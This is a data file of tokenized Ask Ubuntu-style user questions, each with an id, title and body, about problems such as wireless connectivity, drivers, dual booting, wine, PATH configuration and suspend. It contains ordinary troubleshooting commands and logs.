282123	ca n't connect to wireless network ubuntu 12.04	i am having trouble connecting to my wireless network after reinstalling ubuntu 12.04 on my laptop . i used to dual boot 12.04 and windows on this computer and i had no problems with my wireless at that point . my wireless problem started when i removed windows and attempted a fresh install of 12.04 by itself . other info : my wired connection is fine i can establish a wireless connection when booting from a usb but not from my hard drive install . thanks
282126	i am running lucid , ubuntu one is installed but i do n't have a menu item to run it	i do n't know how to run it from the terminal . i tryed unity -- reset , a command i found in a response to a similar question , but got the error message no command 'unity ' found . thanks for any suggestions you can make .
282137	why did ubuntu try to self-destruct ?	i was using ubuntu happily for some months ( almost fully updated , latest amd driver and everything ) . about a week ago i started trying to install some games that i bought on humble bundle that i downloaded at home and other pcs ( my internet is a piece of crap , so it 's easier by torrent ) , and some of them were .deb files . when i tried to install those , some would try to install and then go back , like nothing happened ( probably because of an internal error ) , or asked for dependencies that i could n't find . because of those problems , i tried to install the same packages using the terminal ( using sudo dpkg -i < package name > ) , but after a while a red balloon icon appeared on the menu bar with an error on a file that contained repositories ( do n't remember the exact error , sorry . but i think it was that it was invalid and it could n't write it ) . i left it to fix later , but after a while the software center started giving broken package error and asked to repair it , so i opened the terminal and did apt-get install -f , like i did when that happened before . it asked me to download 888 kb of packages and i allowed it , but then , shortly after , it started removing everything on the system on its on . it uninstalled the interface , the network driver , a lot of programs , and so on . when i noticed it , i quickly closed it but it was too late . the network connection menu was gone ( and probably the driver ) , so i could n't use the internet . seeing that there was nothing i could do on my own , i rebooted to see if it was temporary , but now the system boots without a graphical interface ( it only shows tty ) . i have a 3g internet ( slow as hell ) , and i do n't know how to connect it using only the terminal , so it is a lot more difficult to fix it . so , is it possible to fix it without reinstalling ( pleeease , do n't make me reinstall that with this crappy connection ) ? , and i have the live usb here if necessary . oh , and i forgot to give important information . i am using ubuntu 12.10 amdx64 , installed on a 101gb ext4 partition . there were only 58mb ( approximately ) of updates waiting to be done ( so it was updated , mostly ) .
282138	how to change wifi refresh time	the wireless network manager in my ubuntu 12.10 respond pretty late to the change in wifi network ( s ) i.e even when sometime switch my wifi on or off it does n't shows them for quite a time.whereas same network ( s ) when changed , is showed pretty quickly in my friends laptop which has windows 7 on it . so what can i do to change my wireless network refresh time so that it responds a bit faster .
282145	falling back to unity-2d after an update	i have a laptop with nvidia optimus technology and i had installed bumblebee ( running ubuntu 12.04 64bit ) . after an update ubuntu-2d is loaded ( i verified that with echo $ desktop_session printing ubuntu-2d ) even if `` ubuntu '' is selected at the login screen . what can i do to restore unity-3d ?
282148	could ubuntu touch work on any android tablet ? or just galaxy and nexus ?	is it expected a fail , attempting to install ubuntu touch on an android tablet other than galaxy or nexus ? thanks
282149	choose wrong option during install and lost partitions	i tried ubuntu 13.04 beta in my pc with live dvd . when i wanted to install ubuntu i choose to delete my windows wrongly ! . i see the page that we must to select time location and here i realized my mistake so quickly cancel the installatio . but i lost my partitions . is there any hope that i recover my files and partitions ? .i have really important information on it . please help me : (
282153	add entries to startup applications using a post-install script	i 'm gathering commands to build a post-installation script , and i want to have the script automagically add certain apps to the startup applications list as if i had added them manually , such as the gnome login sound , and xscreensaver . any ideas ?
282162	installing phablet-tools	when i try to run in terminal : sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot it gives the response : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package phablet-tools
282166	better driver for synaptics touchpads	ubuntu is said to have a 'generic driver ' - does this mean it is missing features ? there are a few features i miss from my touchpad under windows . i will list some of them here : 1 . ) circular scrolling : continuous scroll for both vertical and horizontal scrolling that keeps moving only up or only down with any given direction or rotation of the finger ( not the thing where if you were scrolling down and continuing the stroke with a rotation that it scrolls up when your finger starts moving up , or down when your finger starts moving down ) 2 . ) the ability to have one finger on the bottom of the touchpad ( making contact ) for clicking and another on the upper part for general movements 3 . ) windows ' added precision option please note that i have tried manipulating gsynaptics-device-settings and i have attempted to modify the xorg.conf ( and screwed a bunch of stuff up on the way ) . is there any way to gain some of these features back ? or will i have to disobey synaptics ' user agreement and try to reverse engineer the driver they have for linux ( and most likely lose hair and spend a lot of time crying , ultimately leading to failure ) ?
282177	oracle virtualbox focus not changing	i run virtualbox in many environments and in ubuntu this is the only place where i have come across this bug i 've installed the latest virtualbox and this problem still persists , it 's odd basically it 's when you have a vm open with the display as full screen when you click on the minimise button on the options menu , the place where you can select to install guest additions from you see the vm minimise animation go off to the launcher but then when you move the mouse focus goes back to the minimised vm once you click on it again focus goes back to your desktop i 'm currently running ubuntu 13.04 but i happens with 12.10 as well if you need further detail maybe i 'll be able to post a video of it , i think what i 'd like to know is anyone else having this issue ?
282178	i have a launch command that works but only in the terminal - how can i get this command to work in startup applications ?	today , after much searching , i found the command xdg_current_desktop= keepassx which is supposed to work in `` startup applications '' on 12.04 . so far , i 've only managed to get it to work from the terminal . but after months of research this feels like leap forward to finally see the keepassx icon in the system-tray ! so , i 'd hate to give up now . does anyone feel like helping me figure out how to get this command to work as the default way to start keepassx ? or as a startup app ?
282179	how to turn off update for wireless card	i'am a new linux ubuntu user my version is 12.10 . after updating the os my wireless turned off , becouse i use linux for 10 days i dont know how to fix it . then i reinstalled linux and want to ask you is there a way to use the updater but without installing new drivers for wlan or other hardware .
282181	ca n't run an .exe file unless i 'm in its directory	i 'm running quantal 32-bit with wine 1.4.1 installed . i have a particular .exe file of an old game ( aliens vs predator gold edition ) that runs flawlessly , but it refuses to run unless i am in its exact directory . for example , if in terminal i cd to the game 's directory and run wine avp.exe , it launches with no problem . it also launches fine when i right-click and choose to run with wine windows program loader . however , if i 'm in another directory in terminal , say my home directory , and i try to launch it by calling it 's absolute file path , i.e . wine /home/user/.wine/drive_c/avp/avp.exe it fails to launch and gives me an error message saying that it encountered a `` serious problem and needs to close '' . i have no idea why calling this program from another directory would make any difference , especially since i 've successfully executed other exe files this way . has anyone encountered this before ?
282186	access , from windows , files copied from ubuntu to a media partition	i have a laptop with 3 partitions on a 500gb hdd : windows 8 - 60gb - ntfs ubuntu 12.4 - 40gb - ext4 a media partition - 390gb - ntfs i copied music files to the media partition while using ubuntu but when i logged in to windows i could n't see any files there at all . i would like to be able to access , copy and delete files on this drive partition from both operating systems . how is this possible ?
282189	have to set permissions on every startup	i just installed a fingerprint library called libfprint . after installing , you have to set the permissions up to access the scanner . i thought that this would be permanent but every time i restart i have to set the permissions again i.e gpasswd -a user plugdev chgrp -r plugdev /dev/bus/usb/ any ideas how to set these permanently ? ?
282190	properly play mkv file with external mka audio	i have some mkv files with ordered chapters + segment linking and my own external subs and audio . when i load external subs mplayer2 async subs with video , with external audio it skip segment linking ( external chapters opening & ending ) and audio async with video without this chapters . vlc can play all , but in prologue & opening sync with external audio but episode , ending & preview has difference in two seconds . what can i change to fix this ?
282194	`` depends : ia32-libs-multiarch but it is not installable '' - solution	i noticed this on 12.10 trying to get the android sdk working . for 64 bit versions , it is required to install : sudo apt-get install ia32-libs however , under 64bit 12.10 , i got the following error : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable and > apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done package ia32-libs-multiarch is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ia32-libs-multiarch ' has no installation candidate
282198	find out if lines of a file is sorted	i have a large text file , where each line consists of three numbers , except for a few comment lines that all start with a hashtag ( # ) . i want to verify that the non-comment lines are sorted numerically . is there a good way to do this ? i assume i have to extract all the non-comment lines with something like grep -ve \ # - butwhere do i pipe this to verify that the output is sorted ? note : i am not looking for a way to sort the file , but rather to verify that it already is sorted ( to verify output the output of a program of mine ) . unfortunately , this is n't as common as wanting to sort the contents of a file , or ( even more so ) wanting to list the contents of a folder in a particular order ( alphabetically or by size , for example ) , so google has very little for me ... clarification : the numbers in the file are real , usually on exponential form . i want them sorted in numerical order , which for example means that 0.11000e+02 > 0.90000e+01 > 0.15000e-01 . if it simplifies any , i know that if the file matches what i want , the first two columns will be sorted if counted in pairs - in other words , if the file is valid the third column does n't have to be considered at all . formally , you can express it like this : if x1 and y1 are the first two numbers on one line , and x2 and y2 are the first two numbers on another line , then ( x1 , y1 ) > ( x2 , y2 ) iff ( x1 > x2 ) || ( x1==x2 & & y1 > y2 ) . ( x1 , y1 ) > ( x2 , y2 ) here means that the line with x1 and y1 should be considered larger , the line with x2 and y2 , and ( x1 , y1 ) should appear below ( x2 , y2 ) in the file . sample input : pastebin i expect the above file to be considered as sorted , but if any two lines ( that are not comment lines ) are switched , the file is no longer sorted . note that lines can have leading whitespace .
282201	setting a display 's backlight brightness to be lower than is possible via the normal brightness controls	by normal brightness controls i mean the accelerators on my laptop 's keyboard that seem to integrate with unity . in a dark room , my screen is quite bright , even on the lowest setting . can i override this ? i tried setting it explicitly via both : sudo echo 500 > /sys/class/backlight/acpi_video0/actual_brightness sudo echo 500 > /sys/class/backlight/intel_backlight/actual_brightness but i get a permission denied error . when at the lower bounds via my keyboard 's brighness controls , acpi_video0/actual_brightness is 0 , and intel_backlight/actual_brightness is 729 . can i set the latter value to be even lower ?
282202	why does ubuntu spends so much time setting the network at startup ?	booting got very slow about the time i began testing ubuntu 12.10 quantal . i think networking is one of the causes . i suspect networking is doing a lot of work that is unnecessary ( since it was very fast in 12.04 ) . what might i do ? apr 16 08:05:40 retrograde networkmanager [ 1291 ] : < info > ( eth1 ) : ip6 addrconf timed out or failed . apr 16 08:05:40 retrograde networkmanager [ 1291 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 16 08:05:40 retrograde networkmanager [ 1291 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 16 08:05:40 retrograde networkmanager [ 1291 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) complete . apr 16 08:07:14 retrograde dnsmasq [ 1446 ] : reading /etc/resolv.conf apr 16 08:07:14 retrograde dnsmasq [ 1446 ] : using nameserver 127.0.1.1 # 53
282206	how do i enable multiple-users and fde in ubuntu-touch ?	i 'm not particularly concerned about the problem since it 's still in alpha/beta , but the project site notes the feature . i went ahead and bought a nexus 7 to be on the early adopter platform , so i 'm just wondering if this is something that is `` coming before stable '' or if i 'm missing some configuration step that should maybe be on the project wiki .
282211	have to set multiple displays on every start	i have a hp dv7 with an ati graphic card and i have a samsung monitor connected to the laptop . every time i turn on the laptop the displays are mirrored and i have to go to the catalyst control centre ( administrative ) and change the displays configuration , i have to do this every time i turn on the computer . i didnât try the solution suggested here ( settings for multiple monitors are not stored ) because it took me a lot to make the graphics card work properly and i want to make sure that i have the right solution ( or the `` rightest '' ) thanks !
282213	is there a guide to debian live 's seemingly undocumented ubuntu extension ?	debian live is the tool used to generate livecd images now for ubuntu . there is a manual available for it that notes there is an extension that handles producing ubuntu-style livecds but says very little about what said extensions do . ubuntu is listed on the downstream projects page yet there is nothing for our usage of debian live . there is a blueprint from the o cycle logged on the wiki logged by colin watson . that 's the only thing i could find that tangentially talks about this on the wiki . elsewhere searches just lead back to the web-based copies of manual pages . the main reason for doing this is to avoid going down the route discussed here of building a bespoke netboot image with a tightly tuned preseed for my beagleboard-xm . a way to do this using live-build would be nice . it would also be nice to be able to keep disc images re-spun with updates for those erie looking productions may pick up as collaborators who want to migrate to *buntu .
282215	ca n't access gui mode with virtual box fresh 12.04 install	trying to install 12.04 in virtual box . install went great after restart i get a white error box talking about my graphics . basically i get options to look at different log files or i can run without the gui . i logged in via terminal and then did a sudo apt-get update and then sudo apt-get install update . the first one worked but the second one gives the error unable to locate package update . any ideas here ?
282224	how to install/update to repo nvidia driver 304.88-0ubuntu0.0.2 after installing nvidia 's proprietary driver from their website ?	i installed nvidia driver 310.40 from nvidia 's website on my 12.04 laptop . now thier is an update in update manager showing there is a new version of nvidia driver in the repo 304.88-0ubuntu0.0.2 . if i wanted to update back to this older version of the repo driver can i just do it over the top of the nvidia proprietary driver ? do i need to uninstall , purge or do anything else before changing back to the repo driver ? if i did n't want to install the repo driver how i can stop it from appearing in the update manager everyday ? thanks for you help , greg
282225	installing netflix , terminal is getting hung up	just got ubuntu up and running , i am attempting to follow the steps laid our here to install netflix via wine . i have done the 3 terminal commands , and i believe the package has downloaded . the commands : sudo apt-add-repository ppa : ehoover/compholio sudo apt-get update sudo apt-get install netflix-desktop after this the terminal spits out a user agreement , and i can not get past this . is there some way to minimize the window within the terminal ? this is what i see : . netflix is not yet in my dash . it also appears that a variety of other updates are being held up , i assume , because my terminal is midthought .
282226	can i provide ubuntu virtual image as a appendix of book ?	i work for a publishing company . we are planning to publish a book about web development , and we are going to create web applications in ubuntu environment . but we are now considering web development novices as the major audience of the book . so we 'd like to provide them with ubuntu in virtual image for oracle virtualbox ( the virtual image will be provided on a dvd ) . given that , i 'd like to know if it would be illegal to do that or violate the ubuntu license .
282229	acer aspire one usb linux can not find cd / try again	update - i give up ! ! ** why is this so incredibly difficult to get to run off a variety of different / properly formatted usb sticks ? ubuntu looks great in the demo - but getting it is a joke . i 'll drop off the acer at goodwill . details : processor intel intel ( r ) atom ( tm ) cpu n270 @ 1.60ghz bios acer v0.3305 video intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller video intel corporation mobile 945gse express integrated graphics controller network realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller network atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) storage ata ssdpamm0008g1 storage intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ]
282232	about powering usb device on linux : android camera app recognizes usb camera but ubuntu does n't	on my notebook , i have a usb camera , 32-bit ubuntu 10.04 running on sd card and android jelly bean on flash memory . ubuntu does n't recognize the camera ( even the usb port ) , cause it does n't offer any power supply to it , for some reason . if i connect a wire between a powered usb port and the camera usb port , then dmesg recognizes my the usb port and camera . however , if i remove my sd card , my laptop boots android jb . it also does n't recognize the usb port where the camera is connected . but as i launch the camera application , somehow the usb gets power supply and starts working ! there is some trick on android 's camera service that powers the usb port . does anyone know anything about this ? this is the lsusb output when the usb camera port gets a power supply through the wire i connect . $ lsusb bus 003 device 002 : id 04d9:2ba0 holtek semiconductor , inc . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 013 : id 1e4e:0102 bus 001 device 004 : id 0bda:8176 realtek semiconductor corp . bus 001 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub here is the normal lsusb output , without the usb camera/port being recognized . $ lsusb bus 003 device 002 : id 04d9:2ba0 holtek semiconductor , inc . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 0bda:8176 realtek semiconductor corp . bus 001 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub this is dmesg when i connect the wire . notice it disconnects cause it 's not easy to stand still holding the wire . $ dmesg | tail [ 483.790202 ] uvcvideo : found uvc 1.00 device usb2.0 camera ( 1e4e:0102 ) [ 483.797666 ] input : usb2.0 camera as /devices/pci0000:00/0000:00:04.0/usb1/1-1/1-1:1.0/input/input4 [ 484.608278 ] usb 1-1 : usb disconnect , device number 8 [ 486.123368 ] usb 1-1 : new high speed usb device number 9 using ehci_hcd [ 486.258975 ] usb 1-1 : device descriptor read/all , error -71 [ 486.320237 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 486.896696 ] usb 1-1 : new high speed usb device number 11 using ehci_hcd [ 487.040213 ] uvcvideo : found uvc 1.00 device usb2.0 camera ( 1e4e:0102 ) [ 487.047682 ] input : usb2.0 camera as /devices/pci0000:00/0000:00:04.0/usb1/1-1/1-1:1.0 /input/input5 [ 491.890035 ] usb 1-1 : usb disconnect , device number 11 if possible , where could i find the source code containing the operations executed by the camera app ?
282245	ssh login wakes spun-down storage drives	i 'm running 12.04 on a home server/htpc , and have several storage drives which spin down using values set in /etc/hdparm.conf . sometimes , logging in via ssh causes some or all of the drives to wake up . i set the udisks rule recommended in this post , and the spinning-up went from all the time to just some of the time . i set audit rules , auditctl -w /dev/sde -p rwa -k e , for instance , to try to see what was waking them . checking the audit results with ausearch , i see entries like this when i ssh in : type=path msg=audit ( 04/16/2013 18:16:40.109:502 ) : item=0 name=/dev/sde inode=3010 dev=00:05 mode=block,660 ouid=root ogid=disk rdev=08:40 type=cwd msg=audit ( 04/16/2013 18:16:40.109:502 ) : cwd=/home/absqua type=syscall msg=audit ( 04/16/2013 18:16:40.109:502 ) : arch=x86_64 syscall=open success=yes exit=3 a0=7fffcd697998 a1=800 a2=0 a3=0 items=1 ppid=14054 pid=14055 auid=root uid=root gid=root euid=root suid=root fsuid=root egid=root sgid=root fsgid=root tty=pts0 ses=408 comm=hdparm exe=/sbin/hdparm key=e so , my drives are being woken up by hdparm itself ? how can i figure out what 's calling it ?
282247	how to fix location of windows from second grub	i originally had windows vista , later upgraded to 7 . then i used wubi to install kubuntu alongside windows 7 - my load screen became the black one with white writing ( grub legacy i believe ) . then i ( deliberately ) somehow deleted kubuntu , though i ca n't remember how . i may have just removed the partition ! then i installed an ssd , and cloned windows 7 partition to the ssd . then i installed ubuntu on the original drive , and deleted the old windows . the problem is that somehow i 've ended up with two boot screens . the first is the blue screen ( grub 2 i believe ) which lists ubuntu and windows . ubuntu boots fine , but if i select windows , it takes me to the original black and white boot screen , offering kubuntu and windows 7 . unfortunately , both of these options no longer point to an existing os , and the real windows 7 is hidden ! i tried using boot-repair , but same result . i 've linked the disk summary from boot-repair below . http : //paste.ubuntu.com/5714899/ i guess the problem must be that there is an old grub legacy hanging around somewhere - how can i get rid of it ?
282249	does ubuntu 12.04 works for an asus g75vw ?	i have an asus g75vw , i tired to install ubuntu 12.04 but for some reason it damaged my windows installation and it never loaded me ubuntu to start installing it . i installed then an ubutntu 10.04 and i was able to install it but it does not support my hardware and i cant install my wifi drivers since i live in a hotel because of my job and they only have wireless connection , does ubuntu 12.04 really supports pc 's with intel i7-3610qm cpu ?
282250	is it possible to have windows 8 and ubuntu on the same hard drive ?	it 's my understanding that you ca n't have two different filesystems ( ntfs and ext4 ) on the same hard drive , but that 's exactly what i need to do to run both operating systems on the laptop i 've ordered . i 'll only be running 64-bit operating systems on the computer , if that changes anything .
282256	why wo n't lubuntu install on my hp2133	i recently bought an hp2133 second hand off a friend . i installed fuduntu , but the graphics are unstable and it 's a bit slow.so i decided to try lubuntu . i can boot from my pen drive , but when i try to run the install i get to the `` preparing to install '' page where it verifies i am connected to a power source and the internet , and i am , but it wo n't go to the next page of the install wizard , it just freezes up . i 'm terribly new to linux , what should i do ?
282260	installation problem	ihave created a separate partion for ubuntu and when i use the windows installer to install ubuntu into that drive i 'm facing an error while extracting kernel that `` an error has occurred setting the element data . the request is not supported . ''
282261	can i change my stock amd fan speed ?	i have an amd a4-5300 , and it it running loud . i remember my last amd stock fan being silent . i ca n't change it in my bios , and i see that it might be possible to do through ubuntu when googling . i bet i could do it through the overclocking software that came with my msi fm2-a75ma-e35 motherboard . should i try that in wine or is there a fan control program that everyone already uses with wine ?
282277	ca n't see local java applets in my browser	so i setup the java plugin for firefox , and can see applets that are not stored locally . but whenever i try to run applets that are stored on my machine i get an `` application blocked by security settings : your security settings have blocked a local application from running . '' why is this and how do i fix it ? i get the feeling that it 's ubuntu permissions , not firefox permissions ... but i 'm not sure . i am running 12.10 desktop with gnome3 . thank you !
282278	strange blue flashes when using a screen recorder , white flashes when using vlc to record	i use cinnamon currently and whenever i use ffmpeg to record my screen , blue flashes appear when i interact with the cinnamon panel and applets . when i initiate a recording in vlc , similar things happen but with white flashes instead . example recording here . http : //youtu.be/bx8xhqmivbk edit : tweaked the small applet i use to use avconv , produces the exact same effects as well . avconv -f pulse -ac 2 -i alsa_output.pci-0000_00_14.2.analog-stereo.monitor -f x11grab -s 1920x1080 -r 30 -qscale 1 -i :0.0 $ home/videos/test2.mkv
282282	can not install wine on ubuntu 12.04 ( 64 bit )	~/desktop/wine-1.5.22 $ sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages what to do ?
282283	keyboard layout reverts at every boot	i am using 12.10 with gnome 3 . i changed lightdm to gdm . when i boot up keyboard layout changes to default us layout . when i add another layout to end of list at region settings my selected layout becomes active . what should i do ?
282285	ubuntu : facing problem in installing compass	i want to compile a sass file but whenever i run this command $ compass compile it gives me this error compass : command not found and i tried to install compass by this command $ sudo gem install sass compass -- pre -- no-ri -- no-rdoc it gives me this error . successfully installed sass-3.3.0.alpha.121 error : error installing compass : compass requires sass ( ~ > 3.2.5 , runtime ) 1 gem installed and when i check the version of sass by sass -v it shows haml/sass 2.2.17 so what should i do now ?
282297	suspend resume macbook pro	i 'd like to start with sincere congratulations to the ubuntu team : got a macbook pro 6,2 , and i confirm everything - including smooth install with refind- working very well on this machine . keep on the good work ! if i could , the only missing thing not working is suspend to ram and resume . sadly , it does break everything and produces a bad user experience . expected : work , use the machine close the lid = > the machine goes to sleep ( wait , do something else more than 5 minutes ) once back , open the lid ... wait some seconds .. and continue to work . apple understood since a long time this is one essential differences making people choose mac os x , and not linux . i know your devs do not have much time , but the main issue is not it does not work , but why it does not work ... and thus ( not professional ) devs like me could work on that . btw : i 'm testing kernels , reading intel gfx mailing list ( and following fixes , since i 'm a dev ) , playing with vgaswitcheroo and other things testing workarounds , even black magic , since 2 month without any success ( resume force me to reboot every time , because there is no more keyboard and other things ) will you really fix the suspend resume on macbook pro one day ? thanks in advance -- ericb
282307	~/.profile or ~/.bashrc or ~/.pam_environment	please which one of these should i edit to give me required result of the path to my programs both in normal user and as root . i have added in normal user and as root but there is error as quoted below . i read in one of the ubuntu environment sites that pam_environment is now to be used . but how do i use it to add the path for ns 2.35 and omnet++ ? i have edited some of them but it not working . thanks ! should i use : gedit ~/.profile or gedit ~/.bashrc or gedit ~/.pam_environment i seems to have messed up some of them while i was try to use them to add the path of my ns and omnet . both program were running a week ago but now its having this errors . i need to use any of these , my ns 2.35 is having this error : the program 'ns ' is currently not installed . you can install it by typing : sudo apt-get install ns2 omnettpp also gives the same error . my echo $ path in sudo su gives : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/sbin : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/sbin : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix my echo $ path in sudo su gives : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/sbin : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /home/johna/johna/omnetpp-4.2.2/bin : /home/johna/johna/ns-allinone-2.35/bin : /home/johna/johna/ns-allinone-2.35/tcl8.5.10/unix : /home/johna/johna/ns-allinone-2.35/tk8.5.10/unix : /home/johna/johna/omnetpp-4.2.2/bin : /home/johna/johna/ns-allinone-2.35/bin : /home/johna/johna/ns-allinone-2.35/tcl8.5.10/unix : /home/johna/johna/ns-allinone-2.35/tk8.5.10/unix @ selam thanks for your input please this is the output of this as shown below . is it correct or there are errors that i have made ? root @ mqmk-lenovo-g555 : /home/johna # gedit ~/.bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi export path= $ path : $ home/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/sbin : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix : /root/johna/omnetpp-4.2.2/bin : /root/johna/ns-allinone-2.35/bin : /root/johna/ns-allinone-2.35/tcl8.5.10/unix : /root/johna/ns-allinone-2.35/tk8.5.10/unix export path= $ path : $ home/johna/omnetpp-4.2.2/bin export tcl_library=/usr/share/tcltk/tcl8.5 export ld_library_path= $ ld_library_path : /home/johna/omnetpp-4.2.2/lib export ld_library_path=/home/johna/omnetpp-4.2.2/lib export path= $ path : $ home/johna/ns-allinone-2.35/bin export path= $ path : $ home/johna/ns-allinone-2.35/tcl8.5.10/unix export path= $ path : $ home/johna/ns-allinone-2.35/tk8.5.10/unix export ld_library_path=/home/johna/ns-allinone-2.35/lib export ld_library_path=/home/johna/ns-allinone-2.35/otcl-1.14 export tcl_library=/home/johna/ns-allinone-2.35/tcl8.5.10/library
282309	ubuntu 12.04 hanging problem while working	i 've installed ubuntu 12.04 . frequently ubuntu hangs while working . if i try to work with open source software like gimp and skype then my system becomes hang . what should i do to solve this problem ? my system configuration is : intel i3 processor 160gb hdd 2 gb ddr2 ram i 'm using onboard graphics chipset . no external graphic card .
282311	no grub menu in dual boot with windows 7	i recently installed ubuntu 12.10 , and once i restarted and changed the boot order to normal , it just went like a normal boot into windows 7 . i could n't even select which os i wanted to boot into . so i tried booting with the live usb , but came up with the install again . any suggestions ?
282312	what if i do n't upgrade from 11.04	my friend asked me this question . i tell him about old program 's and security problem 's . is there any more possible problems ?
